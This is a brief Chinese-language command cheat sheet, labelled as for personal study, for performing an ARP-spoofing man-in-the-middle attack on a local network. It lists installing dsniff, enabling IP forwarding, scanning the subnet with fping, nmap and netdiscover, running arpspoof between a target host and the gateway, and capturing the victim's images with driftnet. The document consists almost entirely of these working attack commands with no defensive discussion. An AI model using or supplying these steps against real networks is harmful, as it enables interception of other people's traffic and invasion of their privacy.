注:本文仅供个人学习研究
安装dsniff
apt-get install dsniff
转发开启
echo 1 > /proc/sys/net/ipv4/ip_forward
内网发现
fping -g 192.168.1.0/24
nmap -sP 192.168.1.0/24
netdiscover -r 192.168.1.0/24
ARP攻击
arpspoof -i eth0 -t 192.168.1.12 -r 192.168.1.1
driftnet -i eth0
CENTOS 7
yum install net-tools -y